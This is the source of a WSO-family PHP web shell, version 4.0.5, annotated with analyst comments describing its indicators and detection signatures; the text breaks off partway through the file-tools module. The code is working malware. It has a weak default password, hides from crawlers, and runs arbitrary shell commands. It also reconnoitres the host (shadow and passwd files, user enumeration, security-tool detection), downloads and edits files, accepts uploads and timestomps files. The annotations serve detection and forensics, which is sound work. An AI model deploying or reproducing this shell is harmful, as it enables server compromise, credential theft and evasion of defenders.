<?php
/* WSO 4.0.5 (Web Shell by HARD _LINUX) */
/*
 * ANALYST NOTE (review): this file is a WSO-family PHP web shell, not an
 * application file. Nothing in it is a vulnerability to "fix"; the code is kept
 * byte-for-byte (comments only) so file hashes and content signatures stay valid.
 * If this file is found on a server, treat the host as compromised and preserve
 * the web-server access logs and PHP session files before cleaning up.
 *
 * Indicators visible in this prelude:
 *  - $auth_pass holds an MD5 of the shell password; the value here is md5("admin"),
 *    so anyone who locates the file can log in.
 *  - Any User-Agent containing "Google" receives a fake 404, which hides the shell
 *    from crawlers and from scanners that impersonate them.
 *  - Diagnostics, error logging and execution-time limits are disabled for the
 *    whole request.
 *  - All state travels in POST fields (a, c, p1, p2, p3, charset, ajax, pass, f);
 *    nothing is passed in the query string, so GET-only log review will miss it.
 */
$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
$color = "#fff";
$default_action = 'FilesMan'; // action when POST 'a' is absent (the dispatcher itself is outside this chunk)
@define('SELF_PATH', __FILE__);
// Crawler cloaking: anything identifying itself as Google gets a 404 and nothing else.
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
 header('HTTP/1.0 404 Not Found');
 exit;
}
@session_start();
// Silence every diagnostic so nothing reaches error_log, and remove time limits so
// long-running actions are not cut off.
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0); // removed in PHP 7; '@' does not suppress the resulting fatal error
@define('VERSION', '4.0.5');
// Undo magic_quotes_gpc on POST data so paths and commands arrive unescaped.
// get_magic_quotes_gpc() no longer exists in PHP 8, so this build targets older PHP.
if( get_magic_quotes_gpc() ) {
 function stripslashes_array($array) {
 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
 }
 $_POST = stripslashes_array($_POST);
}
// Login gate. Called from the top-level auth check when no valid session flag exists;
// it never returns (ends in die()).
function printLogin() {
 // Second, broader cloaking layer: common crawler/archiver User-Agents get a 404
 // instead of the password form, so the shell is neither indexed nor archived.
 if(!empty($_SERVER['HTTP_USER_AGENT'])) {
 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
 header('HTTP/1.0 404 Not Found');
 exit;
 }
 }
 // Minimal password form (POST field 'pass'). Detection hint: a page whose entire body
 // is a centred "Password:" input and a submit button labelled ">>".
 die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;'><input type=submit value='>>' style='border:none;background-color:teal;color:#fff;'></form></pre>");
}
// Session authentication. The logged-in flag is stored under md5(HTTP_HOST), so one
// PHP session store can hold logins for several virtual hosts; HTTP_HOST comes from the
// client. With an empty $auth_pass the shell is completely unauthenticated.
// The check is md5($_POST['pass']) == $auth_pass: a loose comparison, not hash_equals(),
// and the stored MD5 is trivially crackable. There is no CSRF protection of any kind.
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
 if( empty( $auth_pass ) ||
 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
 else
 printLogin(); // does not return
// OS detection selects the command aliases and path handling used below.
if( strtolower( substr(PHP_OS,0,3) ) == "win" )
 $os = 'win';
else
 $os = 'nix';
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
// The working directory for every action comes straight from POST 'c', unvalidated.
if( isset( $_POST['c'] ) )
 @chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
 $home_cwd = str_replace("\\", "/", $home_cwd);
 $cwd = str_replace("\\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
 $cwd .= '/';
// Renders the top of every page: CSS, the client-side request helpers, the hidden
// state form 'mf', and a host-information banner. Everything is emitted to the client.
//
// Client-side protocol (the <script> below): set()/g() write the action and its
// arguments into hidden form 'mf' (fields a, c, p1, p2, p3, charset) and POST it to
// REQUEST_URI. a() does the same over XMLHttpRequest with "ajax=true" prepended, and
// processReqChange() expects a reply shaped "<decimal length>\n<javascript>" and
// eval()s the first <length> bytes. A POST carrying exactly that field set, and a
// response body that starts with a number followed by a newline and JavaScript, are
// both usable detection signatures for this shell family.
//
// The unescaped <?=$_POST['a']?> and <?=$_POST['charset']?> reflections are left as
// they are: this is attacker tooling, not an application to harden.
function printHeader() {
 if(empty($_POST['charset']))
 $_POST['charset'] = "UTF-8";
 global $color;
 ?>
<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?> - WSO <?=VERSION?></title>
<style>
 body {background-color:#000;color:#e1e1e1;}
 body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
 table.info {color:#C3C3C3;background-color:#000;}
 span,h1,a {color:<?=$color?> !important;}
 span {font-weight:bolder;}
 h1 {border-left:5px solid teal;padding:2px 5px;font:14pt Verdana;background-color:#222;margin:0px;}
 div.content {padding:5px;margin-left:5px;background-color:#000;}
 a {text-decoration:none;}
 a:hover {text-decoration:underline;}
 .ml1 {border:1px solid #444;padding:5px;margin:0;overflow:auto;}
 .bigarea {width:100%;height:250px; }
 input, textarea, select {margin:0;color:#fff;background-color:#444;border:1px solid #000; font:9pt Courier New;}
 form {margin:0px;}
 #toolsTbl {text-align:center;}
 .toolsInp {width:300px}
 .main th {text-align:left;background-color:#000;}
 .main tr:hover{background-color:#5e5e5e}
 .main td, th{vertical-align:middle}
 .l1 {background-color:#444}
 pre {font:9pt Courier New;}
</style>
<script>
 function set(a,c,p1,p2,p3,charset) {
 if(a != null)document.mf.a.value=a;
 if(c != null)document.mf.c.value=c;
 if(p1 != null)document.mf.p1.value=p1;
 if(p2 != null)document.mf.p2.value=p2;
 if(p3 != null)document.mf.p3.value=p3;
 if(charset != null)document.mf.charset.value=charset;
 }
 function g(a,c,p1,p2,p3,charset) {
 set(a,c,p1,p2,p3,charset);
 document.mf.submit();
 }
 function a(a,c,p1,p2,p3,charset) {
 set(a,c,p1,p2,p3,charset);
 var params = "ajax=true";
 for(i=0;i<document.mf.elements.length;i++)
 params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
 sr('<?=$_SERVER['REQUEST_URI'];?>', params);
 }
 function sr(url, params) {
 if (window.XMLHttpRequest) {
 req = new XMLHttpRequest();
 req.onreadystatechange = processReqChange;
 req.open("POST", url, true);
 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
 req.send(params);
 }
 else if (window.ActiveXObject) {
 req = new ActiveXObject("Microsoft.XMLHTTP");
 if (req) {
 req.onreadystatechange = processReqChange;
 req.open("POST", url, true);
 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
 req.send(params);
 }
 }
 }
 function processReqChange() {
 if( (req.readyState == 4) )
 if(req.status == 200) {
 //alert(req.responseText);
 var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
 var arr=reg.exec(req.responseText);
 eval(arr[2].substr(0, arr[1]));
 }
 else alert("Request error!");
 }
</script>
<head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
<form method=post name=mf style='display:none;'>
<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
</form>
<?php
 // Disk usage and platform fingerprint for the banner.
 $freeSpace = @diskfreespace($GLOBALS['cwd']);
 $totalSpace = @disk_total_space($GLOBALS['cwd']);
 $totalSpace = $totalSpace?$totalSpace:1;
 $release = @php_uname('r');
 $kernel = @php_uname('s');
 // Builds an exploit-db search link for the running kernel (privilege-escalation
 // shopping list). The strpos() arguments are reversed (haystack 'Linux', needle
 // $kernel); it still matches when php_uname('s') returns exactly "Linux".
 $millink='http://www.exploit-db.com/search/?action=search&description=';
 if( strpos('Linux', $kernel) !== false )
 $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
 else
 $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
 // Effective user/group of the PHP worker: tells the operator what the shell runs as.
 if(!function_exists('posix_getegid')) {
 $user = @get_current_user();
 $uid = @getmyuid();
 $gid = @getmygid();
 $group = "?";
 } else {
 $uid = @posix_getpwuid(@posix_geteuid());
 $gid = @posix_getgrgid(@posix_getegid());
 $user = $uid['name'];
 $uid = $uid['uid'];
 $group = $gid['name'];
 $gid = $gid['gid'];
 }
 // Clickable breadcrumb: each path component becomes a g("FilesMan", "<prefix>/") link.
 $cwd_links = '';
 $path = explode("/", $GLOBALS['cwd']);
 $n=count($path);
 for($i=0;$i<$n-1;$i++) {
 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
 for($j=0;$j<=$i;$j++)
 $cwd_links .= $path[$j].'/';
 $cwd_links .= "\")'>".$path[$i]."/</a>";
 }
 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
 $opt_charsets = '';
 foreach($charsets as $item)
 $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';

 // Module menu. The values are the POST 'a' actions this shell understands; only
 // SecInfo, FilesTools, Console, Php and (partially) FilesMan are present in this
 // chunk, the rest are referenced by name only.
 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Port Scanner'=>'PortScanner','Bruteforce'=>'Bruteforce','Network'=>'Network','Domains'=>'Domains');
 if(!empty($GLOBALS['auth_pass']))
 $m['Logout'] = 'Logout';
 $m['Self remove'] = 'SelfRemove';
 $menu = '';
 foreach($m as $k => $v)
 $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
 // On Windows, probe every drive letter and list the ones that exist.
 $drives = "";
 if ($GLOBALS['os'] == 'win') {
 foreach( range('a','z') as $drive )
 if (is_dir($drive.':\\'))
 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
 }
 // Banner: uname, uid/gid, PHP version and safe_mode state, disk usage, breadcrumb,
 // charset selector, and the server IP resolved from the client-supplied Host header.
 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
 '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[Exploit-DB]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00A8A8><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
 '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
 '<table cellpadding=3 cellspacing=0 width=100% style="background-color:teal;"><tr>'.$menu.'</tr></table><div>';
}
// Renders the toolbar at the bottom of every page: change-dir, read-file, mkdir,
// mkfile, execute, and a multipart upload form.
// The upload form is the one request in this chunk that is not sent through the
// hidden 'mf' form: a multipart POST with hidden fields a=FilesMAn, c, p1=uploadFile,
// charset and a file field 'f'. That field combination is a good signature for
// attacker uploads through this shell. (Note the capital 'A' in FilesMAn; whether the
// dispatcher matches it case-insensitively is not visible in this chunk.)
function printFooter() {
 $is_writable = is_writable($GLOBALS['cwd'])?"<font color=teal>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
?>
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%">
 <tr>
 <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
 <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
 </tr>
 <tr>
 <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
 <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
 </tr>
 <tr>
 <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
 <td><form method='post' ENCTYPE='multipart/form-data'>
 <input type=hidden name=a value='FilesMAn'>
 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
 <input type=hidden name=p1 value='uploadFile'>
 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
 <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
 </tr>

</table>
</div>
</body></html>
<?php
}
// Stubs for hosts without the posix extension: the callers only ever index the result,
// so returning false makes those lookups degrade to empty strings. The disable_functions
// check is presumably there because declaring a function whose name is merely disabled
// (still registered) would be a redeclaration error.
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
// Runs a shell command string and returns its stdout as a string.
// This is the shell's command-execution primitive. It tries exec, passthru, system,
// shell_exec and finally popen in turn, so a disable_functions list that omits even
// one of the five still leaves command execution available. Hardening note for
// defenders: disable all of them (and proc_open, which this build does not try)
// together, not selectively.
// Returns a placeholder string rather than '' when the command produced no output,
// and a different placeholder when no execution function is available; both are
// truthy, which matters to which() below.
function ex($in) {
 $out = '';
 if(function_exists('exec')) {
 @exec($in,$out);
 $out = @join("\n",$out);
 }elseif(function_exists('passthru')) {
 ob_start();
 @passthru($in);
 $out = ob_get_clean();
 }elseif(function_exists('system')) {
 ob_start();
 @system($in);
 $out = ob_get_clean();
 }elseif(function_exists('shell_exec')) {
 $out = shell_exec($in);
 }elseif(is_resource($f = @popen($in,"r"))) {
 $out = "";
 while(!@feof($f))
 $out .= fread($f,1024);
 pclose($f);
 }else return "↳ Unable to execute command\n";
 return ($out==''?"↳ Query did not return anything\n":$out);
}
// Formats a byte count for display using binary units (1024-based) with two
// decimals: GB, MB, KB, or the raw number suffixed " B" below 1024.
function viewSize($s) {
 if($s >= 1073741824)
 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
 elseif($s >= 1048576)
 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
 elseif($s >= 1024)
 return sprintf('%1.2f', $s / 1024 ) . ' KB';
 else
 return $s . ' B';
}
// Renders a raw st_mode value (as returned by fileperms()) in ls -l style, e.g.
// "drwxr-xr-x". The first character is the file type from the high bits; 'u' is
// used when none of the known type masks match. The three rwx triplets also fold in
// setuid (0x0800 -> s/S), setgid (0x0400 -> s/S) and sticky (0x0200 -> t/T),
// uppercase when the corresponding execute bit is clear.
function perms($p) {
 if (($p & 0xC000) == 0xC000)$i = 's';
 elseif (($p & 0xA000) == 0xA000)$i = 'l';
 elseif (($p & 0x8000) == 0x8000)$i = '-';
 elseif (($p & 0x6000) == 0x6000)$i = 'b';
 elseif (($p & 0x4000) == 0x4000)$i = 'd';
 elseif (($p & 0x2000) == 0x2000)$i = 'c';
 elseif (($p & 0x1000) == 0x1000)$i = 'p';
 else $i = 'u';
 $i .= (($p & 0x0100) ? 'r' : '-');
 $i .= (($p & 0x0080) ? 'w' : '-');
 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
 $i .= (($p & 0x0020) ? 'r' : '-');
 $i .= (($p & 0x0010) ? 'w' : '-');
 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
 $i .= (($p & 0x0004) ? 'r' : '-');
 $i .= (($p & 0x0002) ? 'w' : '-');
 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
 return $i;
}
// Wraps perms(fileperms($f)) in a colour that reflects what the PHP worker can do
// with the path: red = not readable, white = readable but not writable,
// teal (#00A8A8) = writable. Used to spot writable locations from the banner.
function viewPermsColor($f) {
 if (!@is_readable($f))
 return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
 elseif (!@is_writable($f))
 return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
 else
 return '<font color=#00A8A8><b>'.perms(@fileperms($f)).'</b></font>';
}
// Fallback scandir() for PHP builds where the native one is missing or disabled.
// Note (not fixed, analysis copy): the directory handle is never closed, a failed
// opendir() is not checked, and $files is undefined for an empty listing.
if(!function_exists("scandir")) {
 function scandir($dir) {
 $dh = opendir($dir);
 while (false !== ($filename = readdir($dh))) {
 $files[] = $filename;
 }
 return $files;
 }
}
// Locates a binary by shelling out to `which`. In this chunk it is only called with
// entries from hard-coded tool lists (actionSecInfo), never with request input.
// Observation: ex() returns a non-empty placeholder when `which` prints nothing, so
// the !empty() test appears to always succeed and this function never returns false
// through that path; the tool lists in SecInfo are therefore not reliable.
function which($p) {
 $path = ex('which '.$p);
 if(!empty($path))
 return $path;
 return false;
}
305// Sec. Info go --------------------
// "Sec. Info" module: host reconnaissance. Reports PHP hardening settings, available
// database clients, readable credential files, installed compilers/downloaders,
// security tooling it considers dangerous (AV, IDS, integrity checkers, firewalls),
// /etc/hosts, mounts, disk usage, and on request enumerates local accounts via
// posix_getpwuid(). On Windows it runs ver / net accounts / net user.
// Detection hint: a burst of `which <tool>` invocations for the names in $userful,
// $danger and $downloaders from the web-server user is characteristic of this module.
function actionSecInfo() {
 printHeader();
 echo '<h1>Server security information</h1><div class=content>';
 // Declared at runtime on first use; a second call to actionSecInfo() in the same
 // request would be a redeclaration error. Emits "name: value" (or a <pre> for
 // multi-line values) without HTML escaping.
 function showSecParam($n, $v) {
 $v = trim($v);
 if($v) {
 echo '<span>'.$n.': </span>';
 if(strpos($v, "\n") === false)
 echo $v.'<br>';
 else
 echo '<pre class=ml1>'.$v.'</pre>';
 }
 }

 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
 showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
 showSecParam('Open base dir', @ini_get('open_basedir'));
 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
 $temp=array();
 if(function_exists('mysql_get_client_info'))
 $temp[] = "MySql (".mysql_get_client_info().")";
 if(function_exists('mssql_connect'))
 $temp[] = "MSSQL";
 if(function_exists('pg_connect'))
 $temp[] = "PostgreSQL";
 if(function_exists('oci_connect'))
 $temp[] = "Oracle";
 showSecParam('Supported databases', implode(', ', $temp));
 echo '<br>';

 if( $GLOBALS['os'] == 'nix' ) {
 // Tool lists probed with which(): build tools and interpreters, defensive
 // software the operator wants to know about, and file downloaders.
 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
 // The shadow link passes "etc" (relative, no leading slash) where the passwd link
 // passes "/etc/"; left as found.
 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
 showSecParam('OS version', @file_get_contents('/proc/version'));
 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
 if(!$GLOBALS['safe_mode']) {
 echo '<br>';
 $temp=array();
 foreach ($userful as $item)
 if(which($item)){$temp[]=$item;}
 showSecParam('Userful', implode(', ',$temp));
 $temp=array();
 foreach ($danger as $item)
 if(which($item)){$temp[]=$item;}
 showSecParam('Danger', implode(', ',$temp));
 $temp=array();
 foreach ($downloaders as $item)
 if(which($item)){$temp[]=$item;}
 showSecParam('Downloaders', implode(', ',$temp));
 echo '<br/>';
 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
 showSecParam('HDD space', ex('df -h'));
 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
 // Account enumeration form: p2..p3 is the uid range to walk with posix_getpwuid(),
 // which works even when /etc/passwd itself is not readable by the worker.
 echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
 if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
 $temp = "";
 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
 $uid = @posix_getpwuid($_POST['p2']);
 if ($uid)
 $temp .= join(':',$uid)."\n";
 }
 echo '<br/>';
 showSecParam('Users', $temp);
 }
 }
 } else {
 showSecParam('OS Version',ex('ver'));
 showSecParam('Account Settings',ex('net accounts'));
 showSecParam('User Accounts',ex('net user'));
 }
 echo '</div>';
 printFooter();
}
384// Sec. Info end --------------------
385// File tools go -----------------------
// "File tools" module. p1 is the target path (URL-decoded a second time here),
// p2 selects the operation: download, mkfile, view, highlight, chmod, edit, hexdump,
// rename, touch. p3 carries the operation's argument (new contents, mode, new name,
// timestamp). Every path comes from the request unvalidated.
// Forensics notes:
//  - 'download' streams any readable file gzip-compressed with a Content-Disposition
//    attachment header: exfiltration looks like an ordinary file download.
//  - 'touch' sets mtime and atime to an attacker-chosen value (timestomping), so
//    modification times on this host cannot be trusted; ctime is not settable through
//    touch() and, on most filesystems, will still reflect when the change was made.
//  - 'edit'/'mkfile' write arbitrary content; 'chmod' changes mode bits.
function actionFilesTools() {
 if( isset($_POST['p1']) )
 $_POST['p1'] = urldecode($_POST['p1']);
 // Raw file download (no page chrome), then exit. The is_dir branch is empty.
 if(@$_POST['p2']=='download') {
 if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
 ob_start("ob_gzhandler", 4096);
 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
 if (function_exists("mime_content_type")) {
 $type = @mime_content_type($_POST['p1']);
 header("Content-Type: ".$type);
 }
 $fp = @fopen($_POST['p1'], "r");
 if($fp) {
 while(!@feof($fp))
 echo @fread($fp, 1024);
 fclose($fp);
 }
 } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
 }
 exit;
 }
 // Create an empty file, then fall through into the editor for it.
 if( @$_POST['p2'] == 'mkfile' ) {
 if(!file_exists($_POST['p1'])) {
 $fp = @fopen($_POST['p1'], 'w');
 if($fp) {
 $_POST['p2'] = "edit";
 fclose($fp);
 }
 }
 }
 printHeader();
 echo '<h1>File tools</h1><div class=content>';
 if( !file_exists(@$_POST['p1']) ) {
 echo 'File not exists';
 printFooter();
 return;
 }
 // Owner/group line. Note the group lookup is fed fileowner(), not filegroup()
 // (original behaviour, left as found).
 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
 $gid = @posix_getgrgid(@fileowner($_POST['p1']));
 echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
 if( empty($_POST['p2']) )
 $_POST['p2'] = 'view';
 // Operation tabs; directories only get chmod/rename/touch.
 if( is_file($_POST['p1']) )
 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
 else
 $m = array('Chmod', 'Rename', 'Touch');
 foreach($m as $v)
 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
 echo '<br><br>';
 switch($_POST['p2']) {
 // Escaped dump of the file contents in 1 KiB chunks.
 case 'view':
 echo '<pre class=ml1>';
 $fp = @fopen($_POST['p1'], 'r');
 if($fp) {
 while( !@feof($fp) )
 echo htmlspecialchars(@fread($fp, 1024));
 @fclose($fp);
 }
 echo '</pre>';
 break;
 // PHP syntax highlighting via highlight_file(); <span> is swapped for <font> so
 // the page's own span styling does not override the colours.
 case 'highlight':
 if( is_readable($_POST['p1']) ) {
 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
 $code = highlight_file($_POST['p1'],true);
 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
 }
 break;
 // p3 is an octal mode string ("0755"); it is converted digit by digit, then applied.
 // On success the page reloads with p3 cleared.
 case 'chmod':
 if( !empty($_POST['p3']) ) {
 $perms = 0;
 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
 if(!@chmod($_POST['p1'], $perms))
 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
 else
 die('<script>g(null,null,null,null,"")</script>');
 }
 echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
 break;
 // In-browser editor: a non-empty p3 is written over the file with file_put_contents().
 // (An edit that submits empty content is therefore silently ignored.)
 case 'edit':
 if( !is_writable($_POST['p1'])) {
 echo 'File isn\'t writeable';
 break;
 }
 if( !empty($_POST['p3']) ) {
 @file_put_contents($_POST['p1'],$_POST['p3']);
 echo 'Saved!<br><script>document.mf.p3.value="";</script>';
 }
 echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
 $fp = @fopen($_POST['p1'], 'r');
 if($fp) {
 while( !@feof($fp) )
 echo htmlspecialchars(@fread($fp, 1024));
 @fclose($fp);
 }
 echo '</textarea><input type=submit value=">>"></form>';
 break;
 // Three-column hex dump (offset / hex bytes / printable), 32 bytes per row; the
 // whole file is read into memory first.
 case 'hexdump':
 $c = @file_get_contents($_POST['p1']);
 $n = 0;
 $h = array('00000000<br>','','');
 $len = strlen($c);
 for ($i=0; $i<$len; ++$i) {
 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
 switch ( ord($c[$i]) ) {
 case 0: $h[2] .= ' '; break;
 case 9: $h[2] .= ' '; break;
 case 10: $h[2] .= ' '; break;
 case 13: $h[2] .= ' '; break;
 default: $h[2] .= $c[$i]; break;
 }
 $n++;
 if ($n == 32) {
 $n = 0;
 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
 $h[1] .= '<br>';
 $h[2] .= "\n";
 }
 }
 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
 break;
 // rename() to p3 (any path, so this also moves files); on success the page reloads
 // pointed at the new name.
 case 'rename':
 if( !empty($_POST['p3']) ) {
 if(!@rename($_POST['p1'], $_POST['p3']))
 echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
 else
